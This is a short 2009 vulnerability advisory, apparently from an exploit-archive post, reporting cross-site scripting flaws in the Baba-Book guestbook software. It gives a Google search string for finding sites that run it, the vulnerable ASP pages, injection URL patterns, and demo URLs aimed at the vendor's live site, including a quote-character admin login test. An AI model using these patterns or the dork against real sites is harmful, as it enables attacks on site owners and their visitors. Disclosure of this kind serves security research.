===========================================================================================
 Title    : Multiple Cross-site Scripting (XSS) Vulnerabilities
 Software : Baba-Book
 Vendor   : www.bp371.com
 Date     : 26 April 2009 (Indonesia)
 Author   : Vrs-hCk
 Contact  : d00r@telkom.net
 Blog     : http://c0li.blogspot.com/
===========================================================================================

[-] Google Dork

    "Powered by Baba-Book"

[-] Vulnerable

    post.asp
    gshow.asp
    admin_login.asp

[-] Exploit

    [+] GET Method

        http://[site]/[path]/post.asp?id=1'[XSS]
        http://[site]/[path]/gshow.asp?id=1'[XSS]

    [+] POST Method

        http://[site]/[path]/admin_login.asp

[-] Online Demo

    [+] GET Method

        http://www.bp371.com/ly/gshow.asp?id=1'

    [+] POST Method

        http://www.bp371.com/ly/admin_login.asp
        username & password : '

===========================================================================================
 Greetz : Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa,
          Fluzy, bl4Ck_3n91n3, H312Y, S3T4N, Janroe,
          and a special muaacchh for the one I love (*_^)
          c0li.m0de.0n and Behave oR BeGone !!!
===========================================================================================